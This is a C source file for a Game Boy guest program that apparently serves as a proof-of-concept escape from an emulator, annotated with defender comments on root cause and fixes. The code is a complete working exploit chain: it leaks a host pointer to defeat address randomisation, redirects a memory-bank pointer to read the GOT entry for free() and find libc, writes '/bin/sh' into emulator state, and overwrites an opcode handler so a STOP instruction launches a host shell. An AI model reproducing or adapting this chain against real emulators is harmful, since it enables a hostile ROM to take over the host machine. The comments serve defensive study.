main.c (971B)
/*
 * Guest-side program for a Game Boy emulator (SDCC-style inline asm below).
 *
 * Review context: this is a proof-of-concept for a memory-safety flaw in the
 * emulator that runs it. Every address and offset is a hard-coded constant;
 * the only values obtained at run time are the two pointer reads marked
 * below. The constants are therefore tied to one specific emulator and libc
 * build and are meaningless against any other binary.
 *
 * Defender's reading: the program depends on host-side emulator state
 * (structures holding native 64-bit pointers) being reachable through
 * ordinary guest loads and stores. The "WRAM BANK = -0x13" note suggests the
 * root cause is a bank index that the emulator does not range-check; the
 * emulator source is not part of this file, so confirm there. The fixes
 * belong in the emulator: validate or mask bank numbers before using them as
 * an index, keep native pointers out of guest-addressable memory, and run the
 * emulator sandboxed so a compromised guest cannot start host processes. An
 * emulator process executing /bin/sh is a high-signal event for
 * process-ancestry monitoring.
 */
#include "stdint.h"
#include "string.h"

void
main(void)
{
    /* Guest addresses through which host emulator memory is accessed. */
    volatile static uint8_t *processor_gb;  /* emulator's processor structure, per the notes below */
    volatile static uint8_t *memory_gb;     /* structure 0xd0 bytes before it; presumably the memory/bank state */
    volatile static uint8_t *free_got_gb;   /* guest window used to read through the redirected bank pointer */

    /* Host (64-bit) values recovered or computed from the reads below. */
    volatile static uint64_t op0x00;    /* first 8 bytes of the processor structure */
    volatile static uint64_t base;      /* op0x00 minus a fixed offset; presumably the emulator image base */
    volatile static uint64_t libc;      /* value read via free_got_gb minus a fixed offset; presumably the libc base */
    volatile static uint64_t free_got;  /* base plus a fixed offset; by its name, the GOT slot of free() */
    volatile static uint64_t target;    /* libc plus a fixed offset; the symbol is not named in this file */

    /* NEEDS TO BE FIRST SESSION OF CONTAINER! */
    /* NOTE(review): the reason is not given here; presumably the hard-coded
     * layout only holds for a freshly started emulator process -- confirm. */

    /* processor - wrambanks = -0x126a0 */

    /* WRAM BANK = -0x13 */
    /* NOTE(review): assuming 0x1000-byte banks mapped at guest 0xD000, bank
     * -0x13 starts 0x13000 bytes before wrambanks, which puts an object at
     * -0x126a0 at window offset 0x960, i.e. guest 0xD960 -- consistent with
     * the constant below. The bank selection itself is not performed in this
     * file. A negative bank index should never be accepted by the emulator. */
    processor_gb = (void*) 0xD960;
    memory_gb = processor_gb - 0xd0;

    /* get base from op0x00 */
    /* Run-time read #1: a native pointer read from guest-visible memory.
     * Subtracting a fixed offset from it yields a base address, so address
     * randomisation of that image gives no protection once this read works. */
    op0x00 = *(uint64_t*)processor_gb;
    base = op0x00 - 0x1d420;
    free_got = base + 0x4ad78;

    /* change lcdrambank pointer to access got */
    /* Overwrites an 8-byte pointer at offset 0x90 of the structure behind
     * memory_gb. Afterwards guest address 0x8000 is used to read whatever
     * that pointer refers to -- presumably because the emulator serves that
     * guest region through the pointer without validating it. */
    *(uint64_t*)(memory_gb+0x90) = free_got;
    free_got_gb = (void*) 0x8000;

    /* Run-time read #2: the 8 bytes now visible at guest 0x8000, minus a
     * fixed offset. The slot is only read here, never written. */
    libc = (*(uint64_t*)free_got_gb) - 0x9a6d0;

    target = libc + 0x52290;

    /* Writes "/bin/sh" (8 bytes including the terminator) over the start of
     * the processor structure, replacing the pointer read into op0x00. */
    strcpy((char*)processor_gb, "/bin/sh");

    /* Stores target 0x100 bytes into the processor structure.
     * NOTE(review): 0x10 is the Game Boy STOP opcode, so 0x10*0x10 looks like
     * entry 0x10 of a table with 0x10-byte entries, i.e. the handler pointer
     * for the instruction executed just below -- confirm against the
     * emulator's structure layout. */
    *(uint64_t*)(processor_gb+0x10*0x10) = target;

    /* Executes the guest STOP instruction; presumably this makes the emulator
     * dispatch through the entry overwritten above. */
    __asm \
        stop \
    __endasm;

    /* Spin forever so the guest program never returns from main. */
    while (1);
}